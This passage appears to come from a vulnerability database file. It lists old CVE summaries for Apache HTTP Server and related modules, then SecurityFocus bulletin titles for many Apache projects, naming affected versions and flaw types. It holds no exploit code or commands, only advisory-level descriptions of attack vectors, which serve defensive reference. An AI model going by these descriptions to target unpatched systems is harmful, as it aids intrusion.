6116| [CVE-2000-0883] The default configuration of mod_perl for Apache as installed on Mandrake Linux 6.1 through 7.1 sets the /perl/ directory to be browseable, which allows remote attackers to list the contents of that directory.
6117| [CVE-2000-0869] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 enables WebDAV, which allows remote attackers to list arbitrary diretories via the PROPFIND HTTP request method.
6118| [CVE-2000-0868] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 allows remote attackers to read source code for CGI scripts by replacing the /cgi-bin/ in the requested URL with /cgi-bin-sdb/.
6119| [CVE-2000-0791] Trustix installs the httpsd program for Apache-SSL with world-writeable permissions, which allows local users to replace it with a Trojan horse.
6120| [CVE-2000-0760] The Snoop servlet in Jakarta Tomcat 3.1 and 3.0 under Apache reveals sensitive system information when a remote attacker requests a nonexistent URL with a .snp extension.
6121| [CVE-2000-0759] Jakarta Tomcat 3.1 under Apache reveals physical path information when a remote attacker requests a URL that does not exist, which generates an error message that includes the physical path.
6122| [CVE-2000-0628] The source.asp example script in the Apache ASP module Apache::ASP 1.93 and earlier allows remote attackers to modify files.
6123| [CVE-2000-0505] The Apache 1.3.x HTTP server for Windows platforms allows remote attackers to list directory contents by requesting a URL containing a large number of / characters.
6124| [CVE-1999-1412] A possible interaction between Apple MacOS X release 1.0 and Apache HTTP server allows remote attackers to cause a denial of service (crash) via a flood of HTTP GET requests to CGI programs, which generates a large number of processes.
6125| [CVE-1999-1293] mod_proxy in Apache 1.2.5 and earlier allows remote attackers to cause a denial of service via malformed FTP commands, which causes Apache to dump core.
6126| [CVE-1999-1237] Multiple buffer overflows in smbvalid/smbval SMB authentication library, as used in Apache::AuthenSmb and possibly other modules, allows remote attackers to execute arbitrary commands via (1) a long username, (2) a long password, and (3) other unspecified methods.
6127| [CVE-1999-1199] Apache WWW server 1.3.1 and earlier allows remote attackers to cause a denial of service (resource exhaustion) via a large number of MIME headers with the same name, aka the "sioux" vulnerability.
6128| [CVE-1999-1053] guestbook.pl cleanses user-inserted SSI commands by removing text between "<!--" and "-->" separators, which allows remote attackers to execute arbitrary commands when guestbook.pl is run on Apache 1.3.9 and possibly other versions, since Apache allows other closing sequences besides "-->".
6129| [CVE-1999-0926] Apache allows remote attackers to conduct a denial of service via a large number of MIME headers.
6130| [CVE-1999-0678] A default configuration of Apache on Debian GNU/Linux sets the ServerRoot to /usr/doc, which allows remote users to read documentation files for the entire server.
6131| [CVE-1999-0448] IIS 4.0 and Apache log HTTP request methods, regardless of how long they are, allowing a remote attacker to hide the URL they really request.
6132| [CVE-1999-0289] The Apache web server for Win32 may provide access to restricted files when a . (dot) is appended to a requested URL.
6133| [CVE-1999-0236] ScriptAlias directory in NCSA and Apache httpd allowed attackers to read CGI programs.
6134| [CVE-1999-0107] Buffer overflow in Apache 1.2.5 and earlier allows a remote attacker to cause a denial of service with a large number of GET requests containing a large number of / characters.
6135| [CVE-1999-0071] Apache httpd cookie buffer overflow for versions 1.1.1 and earlier.
6136|
6137| SecurityFocus - https://www.securityfocus.com/bid/:
6138| [104554] Apache HBase CVE-2018-8025 Security Bypass Vulnerability
6139| [104465] Apache Geode CVE-2017-15695 Remote Code Execution Vulnerability
6140| [104418] Apache Storm CVE-2018-8008 Arbitrary File Write Vulnerability
6141| [104399] Apache Storm CVE-2018-1332 User Impersonation Vulnerability
6142| [104348] Apache UIMA CVE-2017-15691 XML External Entity Injection Vulnerability
6143| [104313] Apache NiFi XML External Entity Injection and Denial of Service Vulnerability
6144| [104259] Apache Geode CVE-2017-12622 Authorization Bypass Vulnerability
6145| [104257] Apache Sling XSS Protection API CVE-2017-15717 Cross Site Scripting Vulnerability
6146| [104253] Apache ZooKeeper CVE-2018-8012 Security Bypass Vulnerability
6147| [104252] Apache Batik CVE-2018-8013 Information Disclosure Vulnerability
6148| [104239] Apache Solr CVE-2018-8010 XML External Entity Multiple Information Disclosure Vulnerabilities
6149| [104215] Apache ORC CVE-2018-8015 Denial of Service Vulnerability
6150| [104203] Apache Tomcat CVE-2018-8014 Security Bypass Vulnerability
6151| [104161] Apache Ambari CVE-2018-8003 Directory Traversal Vulnerability
6152| [104140] Apache Derby CVE-2018-1313 Security Bypass Vulnerability
6153| [104135] Apache Tika CVE-2018-1338 Denial of Service Vulnerability
6154| [104008] Apache Fineract CVE-2018-1291 SQL Injection Vulnerability
6155| [104007] Apache Fineract CVE-2018-1292 SQL Injection Vulnerability
6156| [104005] Apache Fineract CVE-2018-1289 SQL Injection Vulnerability
6157| [104001] Apache Tika CVE-2018-1335 Remote Command Injection Vulnerability
6158| [103975] Apache Fineract CVE-2018-1290 SQL Injection Vulnerability
6159| [103974] Apache Solr CVE-2018-1308 XML External Entity Injection Vulnerability
6160| [103772] Apache Traffic Server CVE-2017-7671 Denial of Service Vulnerability
6161| [103770] Apache Traffic Server CVE-2017-5660 Security Bypass Vulnerability
6162| [103751] Apache Hive CVE-2018-1282 SQL Injection Vulnerability
6163| [103750] Apache Hive CVE-2018-1284 Security Bypass Vulnerability
6164| [103692] Apache Ignite CVE-2018-1295 Arbitrary Code Execution Vulnerability
6165| [103528] Apache HTTP Server CVE-2018-1302 Denial of Service Vulnerability
6166| [103525] Apache HTTP Server CVE-2017-15715 Remote Security Bypass Vulnerability
6167| [103524] Apache HTTP Server CVE-2018-1312 Remote Security Bypass Vulnerability
6168| [103522] Apache HTTP Server CVE-2018-1303 Denial of Service Vulnerability
6169| [103520] Apache HTTP Server CVE-2018-1283 Remote Security Vulnerability
6170| [103516] Apache Struts CVE-2018-1327 Denial of Service Vulnerability
6171| [103515] Apache HTTP Server CVE-2018-1301 Denial of Service Vulnerability
6172| [103512] Apache HTTP Server CVE-2017-15710 Denial of Service Vulnerability
6173| [103508] Apache Syncope CVE-2018-1321 Multiple Remote Code Execution Vulnerabilities
6174| [103507] Apache Syncope CVE-2018-1322 Multiple Information Disclosure Vulnerabilities
6175| [103490] Apache Commons Compress CVE-2018-1324 Multiple Denial Of Service Vulnerabilities
6176| [103434] APACHE Allura CVE-2018-1319 HTTP Response Splitting Vulnerability
6177| [103389] Apache Tomcat JK Connector CVE-2018-1323 Directory Traversal Vulnerability
6178| [103222] Apache CloudStack CVE-2013-4317 Information Disclosure Vulnerability
6179| [103219] Apache Xerces-C CVE-2017-12627 Null Pointer Dereference Denial of Service Vulnerability
6180| [103206] Apache Geode CVE-2017-15693 Remote Code Execution Vulnerability
6181| [103205] Apache Geode CVE-2017-15692 Remote Code Execution Vulnerability
6182| [103170] Apache Tomcat CVE-2018-1304 Security Bypass Vulnerability
6183| [103144] Apache Tomcat CVE-2018-1305 Security Bypass Vulnerability
6184| [103102] Apache Oozie CVE-2017-15712 Information Disclosure Vulnerability
6185| [103098] Apache Karaf CVE-2016-8750 LDAP Injection Vulnerability
6186| [103069] Apache Tomcat CVE-2017-15706 Remote Security Weakness
6187| [103068] Apache JMeter CVE-2018-1287 Security Bypass Vulnerability
6188| [103067] Apache Qpid Dispatch Router 'router_core/connections.c' Denial of Service Vulnerability
6189| [103036] Apache CouchDB CVE-2017-12636 Remote Code Execution Vulnerability
6190| [103025] Apache Thrift CVE-2016-5397 Remote Command Injection Vulnerability
6191| [102879] Apache POI CVE-2017-12626 Multiple Denial of Service Vulnerabilities
6192| [102842] Apache NiFi CVE-2017-12632 Host Header Injection Vulnerability
6193| [102815] Apache NiFi CVE-2017-15697 Multiple Cross Site Scripting Vulnerabilities
6194| [102488] Apache Geode CVE-2017-9795 Remote Code Execution Vulnerability
6195| [102229] Apache Sling CVE-2017-15700 Information Disclosure Vulnerability
6196| [102226] Apache Drill CVE-2017-12630 Cross Site Scripting Vulnerability
6197| [102154] Multiple Apache Products CVE-2017-15708 Remote Code Execution Vulnerability
6198| [102127] Apache CXF Fediz CVE-2017-12631 Multiple Cross Site Request Forgery Vulnerabilities
6199| [102041] Apache Qpid Broker-J CVE-2017-15701 Denial of Service Vulnerability
6200| [102040] Apache Qpid Broker CVE-2017-15702 Security Weakness
6201| [102021] Apache Struts CVE-2017-15707 Denial of Service Vulnerability
6202| [101980] EMC RSA Authentication Agent for Web: Apache Web Server Authentication Bypass Vulnerability
6203| [101876] Apache Camel CVE-2017-12634 Deserialization Remote Code Execution Vulnerability
6204| [101874] Apache Camel CVE-2017-12633 Deserialization Remote Code Execution Vulnerability
6205| [101872] Apache Karaf CVE-2014-0219 Local Denial of Service Vulnerability
6206| [101868] Apache CouchDB CVE-2017-12635 Remote Privilege Escalation Vulnerability
6207| [101859] Apache CXF CVE-2017-12624 Denial of Service Vulnerability
6208| [101844] Apache Sling Servlets Post CVE-2017-11296 Cross Site Scripting Vulnerability
6209| [101686] Apache Hive CVE-2017-12625 Information Disclosure Vulnerability
6210| [101644] Apache Wicket CVE-2012-5636 Cross Site Scripting Vulnerability
6211| [101631] Apache Traffic Server CVE-2015-3249 Multiple Remote Code Execution Vulnerabilities
6212| [101630] Apache Traffic Server CVE-2014-3624 Access Bypass Vulnerability
6213| [101625] Apache jUDDI CVE-2009-1197 Security Bypass Vulnerability
6214| [101623] Apache jUDDI CVE-2009-1198 Cross Site Scripting Vulnerability
6215| [101620] Apache Subversion 'libsvn_fs_fs/fs_fs.c' Denial of Service Vulnerability
6216| [101585] Apache OpenOffice Multiple Remote Code Execution Vulnerabilities
6217| [101577] Apache Wicket CVE-2016-6806 Cross Site Request Forgery Vulnerability
6218| [101575] Apache Wicket CVE-2014-0043 Information Disclosure Vulnerability
6219| [101570] Apache Geode CVE-2017-9797 Information Disclosure Vulnerability
6220| [101562] Apache Derby CVE-2010-2232 Arbitrary File Overwrite Vulnerability
6221| [101560] Apache Portable Runtime Utility CVE-2017-12613 Multiple Information Disclosure Vulnerabilities
6222| [101558] Apache Portable Runtime Utility Local Out-of-Bounds Read Denial of Service Vulnerability
6223| [101532] Apache James CVE-2017-12628 Arbitrary Command Execution Vulnerability
6224| [101516] Apache HTTP Server CVE-2017-12171 Security Bypass Vulnerability
6225| [101261] Apache Solr/Lucene CVE-2017-12629 Information Disclosure and Remote Code Execution Vulnerabilities
6226| [101230] Apache Roller CVE-2014-0030 XML External Entity Injection Vulnerability
6227| [101173] Apache IMPALA CVE-2017-9792 Information Disclosure Vulnerability
6228| [101052] Apache Commons Jelly CVE-2017-12621 Security Bypass Vulnerability
6229| [101027] Apache Mesos CVE-2017-7687 Denial of Service Vulnerability
6230| [101023] Apache Mesos CVE-2017-9790 Denial of Service Vulnerability
6231| [100954] Apache Tomcat CVE-2017-12617 Incomplete Fix Remote Code Execution Vulnerability
6232| [100946] Apache Wicket CVE-2014-7808 Cross Site Request Forgery Vulnerability
6233| [100901] Apache Tomcat CVE-2017-12615 Remote Code Execution Vulnerability
6234| [100897] Apache Tomcat CVE-2017-12616 Information Disclosure Vulnerability
6235| [100880] Apache Directory LDAP API CVE-2015-3250 Unspecified Information Disclosure Vulnerability
6236| [100872] Apache HTTP Server CVE-2017-9798 Information Disclosure Vulnerability
6237| [100870] Apache Solr CVE-2017-9803 Remote Privilege Escalation Vulnerability
6238| [100859] puppetlabs-apache CVE-2017-2299 Information Disclosure Vulnerability
6239| [100829] Apache Struts CVE-2017-12611 Remote Code Execution Vulnerability
6240| [100823] Apache Spark CVE-2017-12612 Deserialization Remote Code Execution Vulnerability
6241| [100612] Apache Struts CVE-2017-9804 Incomplete Fix Denial of Service Vulnerability
6242| [100611] Apache Struts CVE-2017-9793 Denial of Service Vulnerability
6243| [100609] Apache Struts CVE-2017-9805 Remote Code Execution Vulnerability
6244| [100587] Apache Atlas CVE-2017-3155 Cross Frame Scripting Vulnerability
6245| [100581] Apache Atlas CVE-2017-3154 Information Disclosure Vulnerability
6246| [100578] Apache Atlas CVE-2017-3153 Cross Site Scripting Vulnerability
6247| [100577] Apache Atlas CVE-2017-3152 Cross Site Scripting Vulnerability
6248| [100547] Apache Atlas CVE-2017-3151 HTML Injection Vulnerability
6249| [100536] Apache Atlas CVE-2017-3150 Cross Site Scripting Vulnerability
6250| [100449] Apache Pony Mail CVE-2016-4460 Authentication Bypass Vulnerability
6251| [100447] Apache2Triad Multiple Security Vulnerabilities
6252| [100284] Apache Sling Servlets Post CVE-2017-9802 Cross Site Scripting Vulnerability
6253| [100280] Apache Tomcat CVE-2017-7674 Security Bypass Vulnerability
6254| [100259] Apache Subversion CVE-2017-9800 Remote Command Execution Vulnerability
6255| [100256] Apache Tomcat CVE-2017-7675 Directory Traversal Vulnerability
6256| [100235] Apache Storm CVE-2017-9799 Remote Code Execution Vulnerability
6257| [100082] Apache Commons Email CVE-2017-9801 SMTP Header Injection Vulnerability
6258| [99873] Apache Sling XSS Protection API CVE-2016-6798 XML External Entity Injection Vulnerability
6259| [99870] Apache Sling API CVE-2016-5394 Cross Site Scripting Vulnerability
6260| [99603] Apache Spark CVE-2017-7678 Cross Site Scripting Vulnerability
6261| [99592] Apache OpenMeetings CVE-2017-7685 Security Bypass Vulnerability
6262| [99587] Apache OpenMeetings CVE-2017-7673 Security Bypass Vulnerability
6263| [99586] Apache OpenMeetings CVE-2017-7688 Security Bypass Vulnerability
6264| [99584] Apache OpenMeetings CVE-2017-7684 Denial of Service Vulnerability
6265| [99577] Apache OpenMeetings CVE-2017-7663 Cross Site Scripting Vulnerability
6266| [99576] Apache OpenMeetings CVE-2017-7664 XML External Entity Injection Vulnerability
6267| [99569] Apache HTTP Server CVE-2017-9788 Memory Corruption Vulnerability
6268| [99568] Apache HTTP Server CVE-2017-9789 Denial of Service Vulnerability
6269| [99563] Apache Struts CVE-2017-7672 Denial of Service Vulnerability
6270| [99562] Apache Struts Spring AOP Functionality Denial of Service Vulnerability
6271| [99509] Apache Impala CVE-2017-5652 Information Disclosure Vulnerability
6272| [99508] Apache IMPALA CVE-2017-5640 Authentication Bypass Vulnerability
6273| [99486] Apache Traffic Control CVE-2017-7670 Denial of Service Vulnerability
6274| [99485] Apache Solr CVE-2017-7660 Security Bypass Vulnerability
6275| [99484] Apache Struts CVE-2017-9791 Remote Code Execution Vulnerability
6276| [99292] Apache Ignite CVE-2017-7686 Information Disclosure Vulnerability
6277| [99170] Apache HTTP Server CVE-2017-7679 Buffer Overflow Vulnerability
6278| [99137] Apache HTTP Server CVE-2017-7668 Denial of Service Vulnerability
6279| [99135] Apache HTTP Server CVE-2017-3167 Authentication Bypass Vulnerability
6280| [99134] Apache HTTP Server CVE-2017-3169 Denial of Service Vulnerability
6281| [99132] Apache HTTP Server CVE-2017-7659 Denial of Service Vulnerability
6282| [99112] Apache Thrift CVE-2015-3254 Denial of Service Vulnerability
6283| [99067] Apache Ranger CVE-2016-8751 HTML Injection Vulnerability
6284| [99018] Apache NiFi CVE-2017-7667 Cross Frame Scripting Vulnerability
6285| [99009] Apache NiFi CVE-2017-7665 Cross Site Scripting Vulnerability
6286| [98961] Apache Ranger CVE-2017-7677 Security Bypass Vulnerability
6287| [98958] Apache Ranger CVE-2017-7676 Security Bypass Vulnerability
6288| [98888] Apache Tomcat CVE-2017-5664 Security Bypass Vulnerability
6289| [98814] Apache Zookeeper CVE-2017-5637 Denial of Service Vulnerability
6290| [98795] Apache Hadoop CVE-2017-7669 Remote Privilege Escalation Vulnerability
6291| [98739] Apache Knox CVE-2017-5646 User Impersonation Vulnerability
6292| [98669] Apache Hive CVE-2016-3083 Security Bypass Vulnerability
6293| [98646] Apache Atlas CVE-2016-8752 Information Disclosure Vulnerability
6294| [98570] Apache Archiva CVE-2017-5657 Multiple Cross-Site Request Forgery Vulnerabilities
6295| [98489] Apache CXF Fediz CVE-2017-7661 Multiple Cross Site Request Forgery Vulnerabilities
6296| [98485] Apache CXF Fediz CVE-2017-7662 Cross Site Request Forgery Vulnerability
6297| [98466] Apache Ambari CVE-2017-5655 Insecure Temporary File Handling Vulnerability
6298| [98365] Apache Cordova For Android CVE-2016-6799 Information Disclosure Vulnerability
6299| [98025] Apache Hadoop CVE-2017-3161 Cross Site Scripting Vulnerability
6300| [98017] Apache Hadoop CVE-2017-3162 Input Validation Vulnerability
6301| [97971] Apache CXF CVE-2017-5656 Information Disclosure Vulnerability
6302| [97968] Apache CXF CVE-2017-5653 Spoofing Vulnerability
6303| [97967] Apache ActiveMQ CVE-2015-7559 Denial of Service Vulnerability
6304| [97949] Apache Traffic Server CVE-2017-5659 Denial of Service Vulnerability
6305| [97948] Apache Batik CVE-2017-5662 XML External Entity Information Disclosure Vulnerability
6306| [97947] Apache FOP CVE-2017-5661 XML External Entity Information Disclosure Vulnerability
6307| [97945] Apache Traffic Server CVE-2016-5396 Denial of Service Vulnerability
6308| [97702] Apache Log4j CVE-2017-5645 Remote Code Execution Vulnerability
6309| [97582] Apache CXF CVE-2016-6812 Cross Site Scripting Vulnerability
6310| [97579] Apache CXF JAX-RS CVE-2016-8739 XML External Entity Injection Vulnerability
6311| [97544] Apache Tomcat CVE-2017-5651 Information Disclosure Vulnerability
6312| [97531] Apache Tomcat CVE-2017-5650 Denial of Service Vulnerability
6313| [97530] Apache Tomcat CVE-2017-5648 Information Disclosure Vulnerability
6314| [97509] Apache Ignite CVE-2016-6805 Information Disclosure and XML External Entity Injection Vulnerabilities
6315| [97383] Apache Flex BlazeDS CVE-2017-5641 Remote Code Execution Vulnerability
6316| [97378] Apache Geode CVE-2017-5649 Information Disclosure Vulnerability
6317| [97229] Apache Ambari CVE-2016-4976 Local Information Disclosure Vulnerability
6318| [97226] Apache Camel CVE-2017-5643 Server Side Request Forgery Security Bypass Vulnerability
6319| [97184] Apache Ambari CVE-2016-6807 Remote Command Execution Vulnerability
6320| [97179] Apache Camel CVE-2016-8749 Java Deserialization Multiple Remote Code Execution Vulnerabilities
6321| [96983] Apache POI CVE-2017-5644 Denial Of Service Vulnerability
6322| [96895] Apache Tomcat CVE-2016-8747 Information Disclosure Vulnerability
6323| [96731] Apache NiFi CVE-2017-5636 Remote Code Injection Vulnerability
6324| [96730] Apache NiFi CVE-2017-5635 Security Bypass Vulnerability
6325| [96729] Apache Struts CVE-2017-5638 Remote Code Execution Vulnerability
6326| [96540] IBM Development Package for Apache Spark CVE-2016-4970 Denial of Service Vulnerability
6327| [96398] Apache CXF CVE-2017-3156 Information Disclosure Vulnerability
6328| [96321] Apache Camel CVE-2017-3159 Remote Code Execution Vulnerability
6329| [96293] Apache Tomcat 'http11/AbstractInputBuffer.java' Denial of Service Vulnerability
6330| [96228] Apache Brooklyn Cross Site Request Forgery and Multiple Cross Site Scripting Vulnerabilities
6331| [95998] Apache Ranger CVE-2016-8746 Security Bypass Vulnerability
6332| [95929] Apache Groovy CVE-2016-6497 Information Disclosure Vulnerability
6333| [95838] Apache Cordova For Android CVE-2017-3160 Man in the Middle Security Bypass Vulnerability
6334| [95675] Apache Struts Remote Code Execution Vulnerability
6335| [95621] Apache NiFi CVE-2106-8748 Cross Site Scripting Vulnerability
6336| [95429] Apache Groovy CVE-2016-6814 Remote Code Execution Vulnerability
6337| [95335] Apache Hadoop CVE-2016-3086 Information Disclosure Vulnerability
6338| [95168] Apache Wicket CVE-2016-6793 Denial of Service Vulnerability
6339| [95136] Apache Qpid Broker for Java CVE-2016-8741 Remote Information Disclosure Vulnerability
6340| [95078] Apache HTTP Server CVE-2016-0736 Remote Security Vulnerability
6341| [95077] Apache HTTP Server CVE-2016-8743 Security Bypass Vulnerability
6342| [95076] Apache HTTP Server CVE-2016-2161 Denial of Service Vulnerability
6343| [95020] Apache Tika CVE-2015-3271 Remote Information Disclosure Vulnerability
6344| [94950] Apache Hadoop CVE-2016-5001 Local Information Disclosure Vulnerability
6345| [94882] Apache ActiveMQ CVE-2016-6810 HTML Injection Vulnerability
6346| [94828] Apache Tomcat CVE-2016-8745 Information Disclosure Vulnerability
6347| [94766] Apache CouchDB CVE-2016-8742 Local Privilege Escalation Vulnerability
6348| [94657] Apache Struts CVE-2016-8738 Denial of Service Vulnerability
6349| [94650] Apache HTTP Server CVE-2016-8740 Denial of Service Vulnerability
6350| [94588] Apache Subversion CVE-2016-8734 XML External Entity Denial of Service Vulnerability
6351| [94513] Apache Karaf CVE-2016-8648 Remote Code Execution Vulnerability
6352| [94463] Apache Tomcat CVE-2016-8735 Remote Code Execution Vulnerability
6353| [94462] Apache Tomcat CVE-2016-6817 Denial of Service Vulnerability
6354| [94461] Apache Tomcat CVE-2016-6816 Security Bypass Vulnerability
6355| [94418] Apache OpenOffice CVE-2016-6803 Local Privilege Escalation Vulnerability
6356| [94247] Apache Tika CVE-2016-6809 Remote Code Execution Vulnerability
6357| [94221] Apache Ranger CVE-2016-6815 Local Privilege Escalation Vulnerability
6358| [94145] Apache OpenMeetings CVE-2016-8736 Remote Code Execution Vulnerability
6359| [93945] Apache CloudStack CVE-2016-6813 Authorization Bypass Vulnerability
6360| [93944] Apache Tomcat Security Manager CVE-2016-6796 Security Bypass Vulnerability
6361| [93943] Apache Tomcat CVE-2016-6794 Security Bypass Vulnerability
6362| [93942] Apache Tomcat Security Manager CVE-2016-5018 Security Bypass Vulnerability
6363| [93940] Apache Tomcat CVE-2016-6797 Security Bypass Vulnerability
6364| [93939] Apache Tomcat CVE-2016-0762 Information Disclosure Vulnerability
6365| [93774] Apache OpenOffice CVE-2016-6804 DLL Loading Remote Code Execution Vulnerability
6366| [93773] Apache Struts CVE-2016-6795 Directory Traversal Vulnerability
6367| [93478] Apache Tomcat CVE-2016-6325 Local Privilege Escalation Vulnerability
6368| [93472] Apache Tomcat CVE-2016-5425 Insecure File Permissions Vulnerability
6369| [93429] Apache Tomcat JK Connector CVE-2016-6808 Remote Buffer Overflow Vulnerability
6370| [93263] Apache Tomcat CVE-2016-1240 Local Privilege Escalation Vulnerability
6371| [93236] Apache MyFaces Trinidad CVE-2016-5019 Remote Code Execution Vulnerability
6372| [93142] Apache ActiveMQ Artemis CVE-2016-4978 Remote Code Execution Vulnerability
6373| [93132] Apache Derby CVE-2015-1832 XML External Entity Information Disclosure Vulnerability
6374| [93044] Apache Zookeeper CVE-2016-5017 Buffer Overflow Vulnerability
6375| [92966] Apache Jackrabbit CVE-2016-6801 Cross-Site Request Forgery Vulnerability
6376| [92947] Apache Shiro CVE-2016-6802 Remote Security Bypass Vulnerability
6377| [92905] Apache CXF Fediz CVE-2016-4464 Security Bypass Vulnerability
6378| [92577] Apache Ranger CVE-2016-5395 HTML Injection Vulnerability
6379| [92331] Apache HTTP Server CVE-2016-1546 Remote Denial of Service Vulnerability
6380| [92328] Apache Hive CVE-2016-0760 Multiple Remote Code Execution Vulnerabilities
6381| [92320] Apache APR-util and httpd CVE-2016-6312 Denial of Service Vulnerability
6382| [92100] Apache POI CVE-2016-5000 XML External Entity Injection Vulnerability
6383| [92079] Apache OpenOffice CVE-2016-1513 Remote Code Execution Vulnerability
6384| [91818] Apache Tomcat CVE-2016-5388 Security Bypass Vulnerability
6385| [91816] Apache HTTP Server CVE-2016-5387 Security Bypass Vulnerability
6386| [91788] Apache Qpid Proton CVE-2016-4467 Certificate Verification Security Bypass Vulnerability
6387| [91738] Apache XML-RPC CVE-2016-5003 Remote Code Execution Vulnerability
6388| [91736] Apache XML-RPC Multiple Security Vulnerabilities
6389| [91707] Apache Archiva CVE-2016-5005 HTML Injection Vulnerability
6390| [91703] Apache Archiva CVE-2016-4469 Multiple Cross-Site Request Forgery Vulnerabilities
6391| [91566] Apache HTTP Server CVE-2016-4979 Authentication Bypass Vulnerability
6392| [91537] Apache QPID CVE-2016-4974 Deserialization Security Bypass Vulnerability
6393| [91501] Apache Xerces-C CVE-2016-4463 Stack Buffer Overflow Vulnerability
6394| [91453] Apache Commons FileUpload CVE-2016-3092 Denial Of Service Vulnerability
6395| [91284] Apache Struts CVE-2016-4431 Security Bypass Vulnerability
6396| [91282] Apache Struts CVE-2016-4433 Security Bypass Vulnerability
6397| [91281] Apache Struts CVE-2016-4430 Cross-Site Request Forgery Vulnerability
6398| [91280] Apache Struts CVE-2016-4436 Security Bypass Vulnerability
6399| [91278] Apache Struts CVE-2016-4465 Denial of Service Vulnerability
6400| [91277] Apache Struts Incomplete Fix Remote Code Execution Vulnerability
6401| [91275] Apache Struts CVE-2016-4438 Remote Code Execution Vulnerability
6402| [91217] Apache Continuum 'saveInstallation.action' Command Execution Vulnerability
6403| [91141] Apache CloudStack CVE-2016-3085 Authentication Bypass Vulnerability
6404| [91068] Apache Struts CVE-2016-1181 Remote Code Execution Vulnerability
6405| [91067] Apache Struts CVE-2016-1182 Security Bypass Vulnerability
6406| [91024] Apache Shiro CVE-2016-4437 Information Disclosure Vulnerability
6407| [90988] Apache Ranger CVE-2016-2174 SQL Injection Vulnerability
6408| [90961] Apache Struts CVE-2016-3093 Denial of Service Vulnerability
6409| [90960] Apache Struts CVE-2016-3087 Remote Code Execution Vulnerability
6410| [90921] Apache Qpid CVE-2016-4432 Authentication Bypass Vulnerability
6411| [90920] Apache Qpid CVE-2016-3094 Denial of Service Vulnerability
6412| [90902] Apache PDFBox CVE-2016-2175 XML External Entity Injection Vulnerability
6413| [90897] Apache Tika CVE-2016-4434 XML External Entity Injection Vulnerability
6414| [90827] Apache ActiveMQ CVE-2016-3088 Multiple Arbitrary File Upload Vulnerabilities
6415| [90755] Apache Ambari CVE-2016-0707 Multiple Local Information Disclosure Vulnerabilities
6416| [90482] Apache CVE-2004-1387 Local Security Vulnerability
6417| [89762] Apache CVE-2001-1556 Remote Security Vulnerability
6418| [89417] Apache Subversion CVE-2016-2167 Authentication Bypass Vulnerability
6419| [89326] RETIRED: Apache Subversion CVE-2016-2167 Security Bypass Vulnerability
6420| [89320] Apache Subversion CVE-2016-2168 Remote Denial of Service Vulnerability
6421| [88826] Apache Struts CVE-2016-3082 Remote Code Execution Vulnerability
6422| [88797] Apache Cordova For iOS CVE-2015-5208 Arbitrary Code Execution Vulnerability
6423| [88764] Apache Cordova iOS CVE-2015-5207 Multiple Security Bypass Vulnerabilities
6424| [88701] Apache CVE-2001-1449 Remote Security Vulnerability
6425| [88635] Apache CVE-2000-1204 Remote Security Vulnerability
6426| [88590] Apache WWW server CVE-1999-1199 Denial-Of-Service Vulnerability
6427| [88496] Apache CVE-2000-1206 Remote Security Vulnerability
6428| [87828] Apache CVE-1999-1237 Remote Security Vulnerability
6429| [87784] Apache CVE-1999-1293 Denial-Of-Service Vulnerability
6430| [87327] Apache Struts CVE-2016-3081 Remote Code Execution Vulnerability
6431| [86622] Apache Stats CVE-2007-0975 Remote Security Vulnerability
6432| [86399] Apache CVE-2007-1743 Local Security Vulnerability
6433| [86397] Apache CVE-2007-1742 Local Security Vulnerability
6434| [86311] Apache Struts CVE-2016-4003 Cross Site Scripting Vulnerability
6435| [86174] Apache Wicket CVE-2015-5347 Cross Site Scripting Vulnerability
6436| [85971] Apache OFBiz CVE-2016-2170 Java Deserialization Remote Code Execution Vulnerability
6437| [85967] Apache OFBiz CVE-2015-3268 HTML Injection Vulnerability
6438| [85759] Apache Jetspeed CVE-2016-2171 Unauthorized Access Vulnerability
6439| [85758] Apache Jetspeed CVE-2016-0712 Cross Site Scripting Vulnerability
6440| [85756] Apache Jetspeed CVE-2016-0710 Multiple SQL Injection Vulnerabilities
6441| [85755] Apache Jetspeed CVE-2016-0711 Mulitple HTML Injection Vulnerabilities
6442| [85754] Apache Jetspeed CVE-2016-0709 Directory Traversal Vulnerability
6443| [85730] Apache Subversion CVE-2015-5343 Integer Overflow Vulnerability
6444| [85691] Apache Ranger CVE-2016-0735 Security Bypass Vulnerability
6445| [85578] Apache ActiveMQ CVE-2010-1244 Cross-Site Request Forgery Vulnerability
6446| [85554] Apache OpenMeetings CVE-2016-2164 Multiple Information Disclosure Vulnerabilities
6447| [85553] Apache OpenMeetings CVE-2016-0783 Information Disclosure Vulnerability
6448| [85552] Apache OpenMeetings CVE-2016-2163 HTML Injection Vulnerability
6449| [85550] Apache OpenMeetings CVE-2016-0784 Directory Traversal Vulnerability
6450| [85386] Apache Hadoop CVE-2015-7430 Local Privilege Escalation Vulnerability
6451| [85377] Apache Qpid Proton Python API CVE-2016-2166 Man in the Middle Security Bypass Vulnerability
6452| [85205] Apache Solr CVE-2015-8796 Cross Site Scripting Vulnerability
6453| [85203] Apache Solr CVE-2015-8795 Mulitple HTML Injection Vulnerabilities
6454| [85163] Apache Geronimo CVE-2008-0732 Local Security Vulnerability
6455| [85131] Apache Struts 'TextParseUtil.translateVariables()' Method Remote Code Execution Vulnerability
6456| [85070] Apache Struts CVE-2016-2162 Cross Site Scripting Vulnerability
6457| [85066] Apache Struts CVE-2016-0785 Remote Code Execution Vulnerability
6458| [84422] Apache TomEE CVE-2016-0779 Unspecified Security Vulnerability
6459| [84321] Apache ActiveMQ CVE-2016-0734 Clickjacking Vulnerability
6460| [84316] Apache ActiveMQ CVE-2016-0782 Multiple Cross Site Scripting Vulnerabilities
6461| [83910] Apache Wicket CVE-2015-7520 Cross Site Scripting Vulnerability
6462| [83423] Apache Xerces-C CVE-2016-0729 Buffer Overflow Vulnerability
6463| [83330] Apache Tomcat CVE-2015-5351 Cross Site Request Forgery Vulnerability
6464| [83329] Apache Tomcat CVE-2015-5174 Directory Traversal Vulnerability
6465| [83328] Apache Tomcat CVE-2015-5345 Directory Traversal Vulnerability
6466| [83327] Apache Tomcat Security Manager CVE-2016-0714 Remote Code Execution Vulnerability
6467| [83326] Apache Tomcat CVE-2016-0763 Security Bypass Vulnerability
6468| [83324] Apache Tomcat Security Manager CVE-2016-0706 Information Disclosure Vulnerability
6469| [83323] Apache Tomcat CVE-2015-5346 Session Fixation Vulnerability
6470| [83259] Apache Hadoop CVE-2015-1776 Information Disclosure Vulnerability
6471| [83243] Apache Solr CVE-2015-8797 Cross Site Scripting Vulnerability
6472| [83119] Apache Sling CVE-2016-0956 Information Disclosure Vulnerability
6473| [83002] Apache CVE-2000-1205 Cross-Site Scripting Vulnerability
